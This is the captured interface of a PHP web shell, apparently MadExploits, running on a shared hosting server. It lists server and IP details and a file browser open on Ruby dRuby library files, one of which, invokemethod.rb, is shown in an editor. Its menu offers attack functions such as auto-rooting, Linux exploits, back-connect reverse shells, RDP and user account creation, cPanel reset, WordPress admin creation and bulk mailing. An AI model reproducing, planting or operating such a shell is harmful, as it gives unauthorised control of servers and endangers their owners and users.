Linux server257.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 185.61.153.106 | : 216.73.216.211
Cant Read [ /etc/named.conf ]
8.1.33
safeqmlm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
lib64 /
ruby /
1.8 /
drb /
[ HOME SHELL ]
Name
Size
Permission
Action
acl.rb
2.58
KB
-rw-r--r--
drb.rb
52.2
KB
-rw-r--r--
eq.rb
253
B
-rw-r--r--
extserv.rb
1.06
KB
-rw-r--r--
extservm.rb
1.6
KB
-rw-r--r--
gw.rb
1.88
KB
-rw-r--r--
invokemethod.rb
775
B
-rw-r--r--
observer.rb
369
B
-rw-r--r--
ssl.rb
4.9
KB
-rw-r--r--
timeridconv.rb
1.47
KB
-rw-r--r--
unix.rb
2.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : invokemethod.rb
# for ruby-1.8.0 module DRb class DRbServer module InvokeMethod18Mixin def block_yield(x) if x.size == 1 && x[0].class == Array x[0] = DRbArray.new(x[0]) end block_value = @block.call(*x) end def perform_with_block @obj.__send__(@msg_id, *@argv) do |*x| jump_error = nil begin block_value = block_yield(x) rescue LocalJumpError jump_error = $! end if jump_error case jump_error.reason when :retry retry when :break break(jump_error.exit_value) else raise jump_error end end block_value end end end end end
Close